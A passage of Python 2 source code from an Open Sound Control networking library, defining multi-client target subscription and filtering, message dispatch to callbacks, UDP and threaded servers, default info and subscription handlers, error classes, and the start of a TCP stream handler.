self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
elif (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying the remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, out)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
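# Usage sketch (the 'space' instance, address and handler are illustrative,
# not part of the original library; 'space' is assumed to be an OSCServer or
# OSCAddressSpace instance):
#   def volume_handler(addr, tags, data, client_address):
#       print "volume set to", data
#   space.addMsgHandler("/mixer/volume", volume_handler)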
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the received message
- tags (string): The OSC-typetags of the received message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-addresses
that have been registered to the server with a callback-function.
If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0, **kwds):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass, **kwds)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock) == 0
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix>' -> serverInfo_handler
- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
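# Minimal server-setup sketch (hypothetical port and handler, not part of the
# original library):
#   s = OSCServer(("localhost", 9001))
#   s.addDefaultHandlers()   # registers 'default', /info, /error, /print (and /subscribe for OSCMultiClient)
#   s.addMsgHandler("/quit", lambda addr, tags, data, src: s.close())
#   s.serve_forever()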
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError, e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
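# Request sketch (hypothetical addresses, not part of the original library): a remote
# client subscribes itself by sending e.g. an OSCMessage to '/subscribe' with the
# arguments "localhost:9001/prefix" "+/video/*", and unsubscribes again by sending
# '/unsubscribe' with "localhost:9001".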
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
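# Framing sketch for the stream transport described above (illustrative only, not
# part of the original library): each packet is preceded by its size as a
# big-endian uint32,
#   framed = struct.pack(">L", len(binary)) + binary
# which is essentially what _transmitMsg()/_receiveMsg() below implement.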
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates an OSCStreamRequestHandler
for each new connection. This is fundamentally different from a packet
oriented server, which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because TCP servers usually spawn a new thread
or process for each new connection. Having every thread operate on the
same address space object would cause severe multithreading
synchronization problems. Therefore: to implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print "SERVER: New client connection."
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
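# Subclassing sketch (class, address and handler names are illustrative, not part
# of the original library):
#   class MyHandler(OSCStreamRequestHandler):
#       def setupAddressSpace(self):
#           self.addMsgHandler("/ping", self.ping_handler)
#       def ping_handler(self, addr, tags, data, client_address):
#           return OSCMessage("/pong")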
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print "SERVER: Client connection handled."
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error, e:
